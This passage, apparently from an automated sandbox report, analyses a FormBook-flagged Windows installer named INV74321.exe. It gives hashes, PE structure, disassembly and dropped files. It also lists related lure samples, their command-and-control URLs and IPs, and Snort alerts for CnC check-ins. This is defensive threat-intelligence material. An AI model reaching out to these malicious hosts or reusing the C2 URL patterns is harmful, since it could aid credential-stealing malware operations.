                                                        • Successful, ratio: 30% (good quality ratio 27.6%)
                                                        • Quality average: 75.5%
                                                        • Quality standard deviation: 29.7%
                                                        HCA Information:
                                                        • Successful, ratio: 91%
                                                        • Number of executed functions: 92
                                                        • Number of non-executed functions: 59
                                                        Cookbook Comments:
                                                        • Adjust boot time
                                                        • Enable AMSI
                                                        • Found application associated with file extension: .exe

                                                        Simulations

                                                        Behavior and APIs

                                                        No simulations

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        64.190.62.111Payment.xlsxGet hashmaliciousBrowse
                                                        • www.tbq.xyz/8u3b/?zh=pMeoFcUrOnbk1x4nqhUPxeupEQvF72c+zp8QecZ5Z//VYoBIM59spEfh73PygENHoSc0uw==&BL3=jFNt_dFXS
                                                        4LkSpeVqKR.exeGet hashmaliciousBrowse
                                                        • www.nouvellecartebancaire.com/uoe8/?V2=LhqpTfJ8&rDHpw=Nr6XIQb0LJy7g3BSKo+ydWEWOraq59KjgAXxyRNEYt403hVE3BM/4MFy9ZsB9HNXCzAN
                                                        Shipping Document.exeGet hashmaliciousBrowse
                                                        • www.perfumebarbyparisine.com/ou59/?kr4Lhj=ndkHzHd&nHLD_b=AgbchBVRB6f0q4bgYsoYiFpejO9RxmhiEQZzFQZe8IuCEkVt+YPwO8avVoDGRZ8G6DaV
                                                        new order.xlsxGet hashmaliciousBrowse
                                                        • www.nouvellecartebancaire.com/uoe8/?PbvtUz=Nr6XIQbxLOy/gnNeIo+ydWEWOraq59KjgAPhuSRFcN413Q5CwRdzuI9w+8AX5XJkJwd94Q==&-Z=zVeT
                                                        GLqbDRKePPp16Zr.exeGet hashmaliciousBrowse
                                                        • www.exportproducers.com/bmfb/?sXR8Etn=5siWUJI2XAz2iC6wNyU71ckItguO5TOs3xA5kKadKWXFMqdmu9FoK1HMNusoD5NnTn7C&2djxG=Yts8sH50jFIPGpa
                                                        SHIPPING DOCUMENT.exeGet hashmaliciousBrowse
                                                        • www.fuerzaagavera.com/dxe/?k0GxOl=RbAtrmEWvlHFDlwUmkIgxTv6ob9YXkoV/NFTjoChCyM+ucvF9ABfViB5xXwNeUqJEtMU&NX1TzP=t8UH-PXh7J
                                                        don.exeGet hashmaliciousBrowse
                                                        • www.nouvellecartebancaire.com/uoe8/?Y4plXns=Nr6XIQb0LJy7g3BSKo+ydWEWOraq59KjgAXxyRNEYt403hVE3BM/4MFy9ZsB9HNXCzAN&BR=cjlpd
                                                        DocNo2300058329.exeGet hashmaliciousBrowse
                                                        • www.chandlerguo.com/ued5/?BR-d4N=7nMpkDO0IdLxFH6P&RL0=bezfYCf7hjYaP7aKm321naJfBhBryPc+PKIQpAm7WhkghlmEMQZYG8wsgYserUfX3+Mq
                                                        APR SOA---- Worldwide Partner--WWP SC+SHA.PDF.exeGet hashmaliciousBrowse
                                                        • www.fittogo.net/o86d/?2dqLW0=RXBPDPWx&Sh=u1IKOnF2O/98NudFSWYnxTXzpqVcceYY3hF/Wy28k7osgxzlZYELTmE21zk7Okf9Jgd9
                                                        VIKRAMQST21-222.exeGet hashmaliciousBrowse
                                                        • www.fittogo.net/o86d/?-Z1l=u1IKOnF2O/98NudFSWYnxTXzpqVcceYY3hF/Wy28k7osgxzlZYELTmE21wISNkjFADorID+xhg==&4h2=k2JX5d7XCd603LJP
                                                        Bank Details Pdf.exeGet hashmaliciousBrowse
                                                        • www.perfumebarbyparisine.com/ou59/?BR=chrxU&Vt=AgbchBVRB6f0q4bgYsoYiFpejO9RxmhiEQZzFQZe8IuCEkVt+YPwO8avVoDsOpMG+BSV
                                                        Wire transfer.exeGet hashmaliciousBrowse
                                                        • www.calmncuddle.com/ca84/?BvI=b2S2nlAqkf94DvgS5p4/7HJ/I6FJ9VAC3yY7Dn54mkFcHBVvzbYxVttZk7rYdKw4iUSE&J690D=ej8PjzaXfDt
                                                        NQ1vVJKBcH.exeGet hashmaliciousBrowse
                                                        • www.yashaxi.com/sdh/?ArR=pv77fZTsJCF4Ec5vscLwE01hgHoFOGvdvEJpexrJMVXWZtOzLqqRHfmNiKriOCyuhwCB&_jqp3R=mvR89v50jF6X
                                                        A9C9824497908A525A168C43D743FEA3D1F5DC4C3004E.exeGet hashmaliciousBrowse
                                                        • cryptofaze.com/index.php
                                                        RDAx9iDSEL.exeGet hashmaliciousBrowse
                                                        • www.trendbold.com/p2io/?NtTdXn=wXL40t9Hkrxhn&KtxL=YuHUVBRMKFCf6NGuNX6aejQt13LdGy2QNXWf2AVYUUbkg/qzJ+lSsvfEiDwNVcpNHrzg
                                                        Yd7WOb1ksAj378N.exeGet hashmaliciousBrowse
                                                        • www.yashaxi.com/sdh/?1b8Hsf=pv77fZTsJCF4Ec5vscLwE01hgHoFOGvdvEJpexrJMVXWZtOzLqqRHfmNiKnidS+t4gCXd4CYSg==&j2MHoV=aDKhQD6PL
                                                        TT COPY (39.750,00 USD).exeGet hashmaliciousBrowse
                                                        • www.fittogo.net/o86d/?8p-LVP8p=u1IKOnF2O/98NudFSWYnxTXzpqVcceYY3hF/Wy28k7osgxzlZYELTmE21wErBFPFXF06&bj=VTWpjpVhfN0xwFd
                                                        lFfDzzZYTl.exeGet hashmaliciousBrowse
                                                        • www.trendbold.com/p2io/?iBIXf4M=YuHUVBRMKFCf6NGuNX6aejQt13LdGy2QNXWf2AVYUUbkg/qzJ+lSsvfEiAcdJt12AeaxGWCaPA==&_RAd4V=YL0THJvhl8d
                                                        SWIFT COPY.exeGet hashmaliciousBrowse
                                                        • www.wbz.xyz/fcn/?2d=l8eDk&-Z2hilB=BzqqiqEgWSn4H0nj5q3NVeG0jFLcTOMmsdTr50lz0wrZDnWPoyh/rI5OywZ8yBQmwoLh
                                                        1400000004-arrival.exeGet hashmaliciousBrowse
                                                        • www.healthpro.info/hwad/?p0D=ViWewpzPt5NCxCWjvt8gvvbWSNygKN3e34Vf9Qt00/TaXPrG4jpuYY6xUt/mVWAfJkXy&wPN=OtWDJt

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        www.downtoearthwork.comPO09641.exeGet hashmaliciousBrowse
                                                        • 172.67.223.227

                                                        ASN

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        PUBLIC-DOMAIN-REGISTRYUSNAVTECO_R1_10_05_2021,pdf.exeGet hashmaliciousBrowse
                                                        • 116.206.104.92
                                                        #10052021.exeGet hashmaliciousBrowse
                                                        • 116.206.104.66
                                                        shipping docs and BL_pdf.exeGet hashmaliciousBrowse
                                                        • 208.91.198.143
                                                        PDF.9066721066.exeGet hashmaliciousBrowse
                                                        • 208.91.199.224
                                                        Payment Advice Note from 10.05.2021 to 608760.exeGet hashmaliciousBrowse
                                                        • 208.91.199.224
                                                        551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                        • 162.222.225.153
                                                        551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                        • 162.222.225.153
                                                        export of document 555091.xlsmGet hashmaliciousBrowse
                                                        • 103.21.58.29
                                                        RFQ-20283H.exeGet hashmaliciousBrowse
                                                        • 208.91.198.143
                                                        BTC-2021.exeGet hashmaliciousBrowse
                                                        • 208.91.199.225
                                                        invoice 85046.xlsmGet hashmaliciousBrowse
                                                        • 103.21.58.29
                                                        copy of invoice 4347.xlsmGet hashmaliciousBrowse
                                                        • 103.21.58.29
                                                        Copia de pago.exeGet hashmaliciousBrowse
                                                        • 208.91.199.225
                                                        NEW PI#001890576.exeGet hashmaliciousBrowse
                                                        • 208.91.199.223
                                                        bill 04050.xlsmGet hashmaliciousBrowse
                                                        • 103.21.59.208
                                                        PO 4500379537.exeGet hashmaliciousBrowse
                                                        • 208.91.199.225
                                                        catalog-949138716.xlsGet hashmaliciousBrowse
                                                        • 199.79.62.12
                                                        catalog-949138716.xlsGet hashmaliciousBrowse
                                                        • 199.79.62.12
                                                        B5Cg5YZIzp.exeGet hashmaliciousBrowse
                                                        • 208.91.199.223
                                                        zWk3NAlzPw.exeGet hashmaliciousBrowse
                                                        • 162.215.241.145
                                                        DXTL-HKDXTLTseungKwanOServiceHKRFQ-2176 NEW PROJECT QUOTATION MAY.exeGet hashmaliciousBrowse
                                                        • 45.192.65.131
                                                        invscan052021.exeGet hashmaliciousBrowse
                                                        • 154.81.74.168
                                                        SNBDBM2No4.exeGet hashmaliciousBrowse
                                                        • 154.94.94.239
                                                        BORMAR SA_Cotizaci#U00f3n de producto doc.exeGet hashmaliciousBrowse
                                                        • 45.196.105.164
                                                        Shipping Document.exeGet hashmaliciousBrowse
                                                        • 154.215.201.22
                                                        GZocMWoCzL3Rd62.exeGet hashmaliciousBrowse
                                                        • 45.199.11.118
                                                        krcgN6CaG9.exeGet hashmaliciousBrowse
                                                        • 156.235.164.47
                                                        SWIFT 00395_IMG.exeGet hashmaliciousBrowse
                                                        • 45.192.92.174
                                                        6e139f3d_by_Libranalysis.exeGet hashmaliciousBrowse
                                                        • 154.86.216.242
                                                        Comand#U0103 de achizi#U021bie PP050321.exeGet hashmaliciousBrowse
                                                        • 45.197.75.9
                                                        O1E623TjjW.exeGet hashmaliciousBrowse
                                                        • 156.239.92.159
                                                        shipping document pdf.exeGet hashmaliciousBrowse
                                                        • 156.238.108.93
                                                        91365ef0_by_Libranalysis.exeGet hashmaliciousBrowse
                                                        • 154.80.150.90
                                                        INV 57474545.docGet hashmaliciousBrowse
                                                        • 154.86.204.238
                                                        lBXZjiCuW0.exeGet hashmaliciousBrowse
                                                        • 45.192.65.143
                                                        DHL_S390201.exeGet hashmaliciousBrowse
                                                        • 45.194.219.231
                                                        DRAFT SHIPPING DOCUMENTS.xlsxGet hashmaliciousBrowse
                                                        • 154.84.125.40
                                                        Bank Details Pdf.exeGet hashmaliciousBrowse
                                                        • 154.95.188.245
                                                        Wire transfer.exeGet hashmaliciousBrowse
                                                        • 156.235.238.98
                                                        DHL Express Service.exeGet hashmaliciousBrowse
                                                        • 154.86.241.165
                                                        NBS11696USPayment.xlsxGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        4LkSpeVqKR.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        Shipping Document.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        new order.xlsxGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        GLqbDRKePPp16Zr.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        SHIPPING DOCUMENT.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        don.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        DocNo2300058329.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        APR SOA---- Worldwide Partner--WWP SC+SHA.PDF.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        VIKRAMQST21-222.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        Bank Details Pdf.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        Wire transfer.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        NQ1vVJKBcH.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        A9C9824497908A525A168C43D743FEA3D1F5DC4C3004E.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        RDAx9iDSEL.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        Yd7WOb1ksAj378N.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        TT COPY (39.750,00 USD).exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        lFfDzzZYTl.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        SWIFT COPY.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        1400000004-arrival.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Temp\k0bmhafw06
                                                        Process:C:\Users\user\Desktop\INV74321.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):164352
                                                        Entropy (8bit):7.99866949860899
                                                        Encrypted:true
                                                        SSDEEP:3072:hRfkvdzNhJNYNhBR9+T6xzrSSgm/XDQs4JZGbRE1RnW2QnBYYrU1tukIWaXM93:hSvddNYJ+WxzNvDozGbRE1RbQnBYYwK+
                                                        MD5:47632082CDD419FABE009ECFD57523E1
                                                        SHA1:5B1B84805D90C013BE479E90532D413C47A9337F
                                                        SHA-256:22B8E49FC074DCA87B646701C013C3A6337BEF6C6D222D2CA6466289BE2B64CD
                                                        SHA-512:EF2200B4933C491642B308339546B1DC98BC23F45B909339E58D337F1A8A84B7BE7F57B7060159B47A67C4709C83D6574FF2229BE6E3486EFBD1DD81F14C9484
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview: s..........o...Q&.../.U..z..y.M.......B......=....S....bB...S6...Y.R...E.B.^.-ix....7-.-.lRx......03Y..i.&.QP.Fq..*....!X..2.N.I.:.aM..9`$..uaHl.\k...a.m8..X..b...FQ..|.i.#Y-M....gs.t....N...P...n..fG..%....2........vU.....S.....9l......g.......?.XN.._..8`..R5.69b.y........m.5.v....Q.`.2r.3.%..Q....'H{..qs.V3.UAF.x....F.2&U.9s..:....G<L...Sw..I;.C...0X<].+.=g.2...!.%..l .U....J.nO.B....R...?..yxq....6.8=.L.!....:...~....6.$.`.Y.W..h...^.{a.S.n.,b.5..&..@89..pq...j..*.)uV.f.......sWICS....N|..mT...W#. .D#........;......5.E..S......`.......0.".D.\.....hA{.....ZVU.....g...9%...u.Sy.c).bB.<<,.:.I5...;A.^..s..&...i.....^..o.x._!..r..9.@..uC.n'D .D...c.........I.v......$w....Z.......Z...+....G.A...}....5......m..'.P..o..R.8..N..{3Q...8<y.(........{.O.N......*..`.....G.Z.....M..<-....O.c.L....Y^.9...CMj3......D.xC.!....i...<v.}F..}....K.7B...gj.T..zu.......=......G.....}......T.a.....`.....:.&..B.o...F..4..VAG...vC...CE..Z..b7..K
                                                        C:\Users\user\AppData\Local\Temp\k40o4d06bo6
                                                        Process:C:\Users\user\Desktop\INV74321.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):6661
                                                        Entropy (8bit):7.969996174404535
                                                        Encrypted:false
                                                        SSDEEP:96:GWc65KZOCmbbSyasSocd7r8R5lFQk+vd2ilwhRMR/t+UdO1lKtnIMzlg+o5:PUtmH/orSjheDlwXMR/tFdO1stn3gt5
                                                        MD5:5ADEB3A9190FFDF42FE06B34B0F68928
                                                        SHA1:2C01B27F4595DEA6E70E733D5C264ABF054C9B9F
                                                        SHA-256:64AFFD574DE23B95A724A54208BD070EF00B2A049FF3A281338987D09F997F5E
                                                        SHA-512:4E398D7EDB98903456267761D0EF23880AEE5EC78A3C9F852480D0B22E90D48CBAC078EA11DF78B0A90BA84ADC03483820299BF475D5E510BC9FD31414A450F6
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview: .y.....-......{..r.->'...'....I..k.j....i....j...68[r}p.[.tE[MR..-.ze..c....]\...I...-...w.7.....c...J,.......k....54/......m'.!...<2I....US.bDs....#.3 V.MLG..Y. '...<'.Za)...=.U.\{=...0.......n:.SI.J....>.=....?.eemrtC..x..(..t.....|~.y..$.H..8...................J.....8.$JQk..#-.%.l......{.X..utoIJQF..gnaO.O|.....K..."..G.JUcas`............fiG.gT..k..3......g;2-...(..#%$.+!V........Y{N0...O7......ZE..p+.nb}.@....=.vy..../Z?...i....H.Qx,.....y...=.......`.I.;..h..+"....b..+.1...6%7.....y......=.....~qp..s .V.-.9....].*.{.&{.L...X..]sjuET.x.{.v=..na......'.K.F...>1..rT..._..7.......R..._Dy.a.....Z.#.69...,'.6.-BYF.3.../2.....Q|....]"._..XC.. '....tU3}|.j;../6b!.e"..5.ZK.u+...H.T..9.(.3U.....g..X.OQ.pV..L..+.l. ....:@........c.........]@..Y...W~...'...'QX..(..R..\"..k.....$.._QlG.4...,ymlXAnO|.n..s.*O.E.p........F.5.....N:....`k.R..........&)/6f8..-V..! ...-....U.[.H3.<FWm...\.G.L..A..ZED)k...e.e.j....F.b;.g,N.P.'.R..Y...x.......d>....v........
                                                        C:\Users\user\AppData\Local\Temp\nsi6113.tmp\q7pl.dll
                                                        Process:C:\Users\user\Desktop\INV74321.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):4096
                                                        Entropy (8bit):4.257823721570018
                                                        Encrypted:false
                                                        SSDEEP:48:iYkYOn1ASkT3Jd95Ei4T53wz4KbCVhbmhnheBKbgXWoqsScz5dXm:ncn1ASkP34V3RKevKcXWoq7cz
                                                        MD5:792AB8BC6ED1C1B28D996EBDC1873E8C
                                                        SHA1:46D80F21EBA3150D206D9BDEF98FACD4867147AC
                                                        SHA-256:575C27017B612C76736D0B43645A8C942477B37BFD5CA34D6D82C004885283C4
                                                        SHA-512:18E7014BDF7264942A62C19A5B155ED5975AB822696CBBF3D9143EC8E2A8AE67569F9B4209CBCECDB6E0740579CBBA41294F89F2493D91D577CC7E01DEB32138
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Metadefender, Detection: 26%, Browse
                                                        • Antivirus: ReversingLabs, Detection: 55%
                                                        Reputation:low
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................PE..L....}.`...........!......................... ...............................@....................................... ..T....!....................................... ............................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Entropy (8bit):5.746555859558499
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:INV74321.exe
                                                        File size:579490
                                                        MD5:877bb5661fe79bb7f48cfb3ea54537a0
                                                        SHA1:dd6b5263da3b4f1a42e89c2c1ade852098561c5d
                                                        SHA256:87935ff36515ecb6a4177c25ad1d11e8d2882aa1c3f369e719406f063a062517
                                                        SHA512:a13e5bab1301b2f716945d526f1e1299b659fd2facb687fe1762348578e3d4a71993e97145481d35399f7fe369def77d5bfd4e32376b78a0116012f6370f8472
                                                        SSDEEP:6144:q9X0G6+bQSvddNYJ+WxzNvDozGbRE1RbQnBYYwKc7:c0f+bQWdNYZZDoGbREfbsuXKa
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L...".$_.................f...|......H3............@

                                                        File Icon

                                                        Icon Hash:e886a37159aadcf8

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x403348
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                        Time Stamp:0x5F24D722 [Sat Aug 1 02:44:50 2020 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:ced282d9b261d1462772017fe2f6972b

                                                        Entrypoint Preview

                                                        Instruction
                                                        sub esp, 00000184h
                                                        push ebx
                                                        push esi
                                                        push edi
                                                        xor ebx, ebx
                                                        push 00008001h
                                                        mov dword ptr [esp+18h], ebx
                                                        mov dword ptr [esp+10h], 0040A198h
                                                        mov dword ptr [esp+20h], ebx
                                                        mov byte ptr [esp+14h], 00000020h
                                                        call dword ptr [004080B8h]
                                                        call dword ptr [004080BCh]
                                                        and eax, BFFFFFFFh
                                                        cmp ax, 00000006h
                                                        mov dword ptr [0042F42Ch], eax
                                                        je 00007F6884AB8B33h
                                                        push ebx
                                                        call 00007F6884ABBC96h
                                                        cmp eax, ebx
                                                        je 00007F6884AB8B29h
                                                        push 00000C00h
                                                        call eax
                                                        mov esi, 004082A0h
                                                        push esi
                                                        call 00007F6884ABBC12h
                                                        push esi
                                                        call dword ptr [004080CCh]
                                                        lea esi, dword ptr [esi+eax+01h]
                                                        cmp byte ptr [esi], bl
                                                        jne 00007F6884AB8B0Dh
                                                        push 0000000Bh
                                                        call 00007F6884ABBC6Ah
                                                        push 00000009h
                                                        call 00007F6884ABBC63h
                                                        push 00000007h
                                                        mov dword ptr [0042F424h], eax
                                                        call 00007F6884ABBC57h
                                                        cmp eax, ebx
                                                        je 00007F6884AB8B31h
                                                        push 0000001Eh
                                                        call eax
                                                        test eax, eax
                                                        je 00007F6884AB8B29h
                                                        or byte ptr [0042F42Fh], 00000040h
                                                        push ebp
                                                        call dword ptr [00408038h]
                                                        push ebx
                                                        call dword ptr [00408288h]
                                                        mov dword ptr [0042F4F8h], eax
                                                        push ebx
                                                        lea eax, dword ptr [esp+38h]
                                                        push 00000160h
                                                        push eax
                                                        push ebx
                                                        push 00429850h
                                                        call dword ptr [0040816Ch]
                                                        push 0040A188h

                                                        Rich Headers

                                                        Programming Language:
                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x85440xa0.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x5add0.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x64570x6600False0.66823682598data6.43498570321IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rdata0x80000x13800x1400False0.4625data5.26100389731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0xa0000x255380x600False0.463541666667data4.133728555IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .ndata0x300000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .rsrc0x380000x5add00x5ae00False0.0560468964924data3.59489590651IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountry
                                                        RT_ICON0x382800x42028dataEnglishUnited States
                                                        RT_ICON0x7a2a80x10828dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                        RT_ICON0x8aad00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                        RT_ICON0x8ecf80x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                        RT_ICON0x912a00x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                        RT_ICON0x923480x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                        RT_DIALOG0x927b00x100dataEnglishUnited States
                                                        RT_DIALOG0x928b00x11cdataEnglishUnited States
                                                        RT_DIALOG0x929d00x60dataEnglishUnited States
                                                        RT_GROUP_ICON0x92a300x5adataEnglishUnited States
                                                        RT_MANIFEST0x92a900x340XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                        Imports

                                                        DLLImport
                                                        ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                        SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                        ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                        COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                        USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                        GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                        KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                                        Possible Origin

                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                        05/12/21-07:36:20.954955ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                                                        05/12/21-07:36:21.998903ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                                                        05/12/21-07:36:25.546082TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.3119.18.54.126
                                                        05/12/21-07:36:25.546082TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.3119.18.54.126
                                                        05/12/21-07:36:25.546082TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.3119.18.54.126
                                                        05/12/21-07:36:31.764293TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973380192.168.2.3163.43.122.109
                                                        05/12/21-07:36:31.764293TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973380192.168.2.3163.43.122.109
                                                        05/12/21-07:36:31.764293TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973380192.168.2.3163.43.122.109
                                                        05/12/21-07:36:37.560160TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973480192.168.2.3104.21.46.55
                                                        05/12/21-07:36:37.560160TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973480192.168.2.3104.21.46.55
                                                        05/12/21-07:36:37.560160TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973480192.168.2.3104.21.46.55
                                                        05/12/21-07:36:58.988852TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973880192.168.2.364.190.62.111
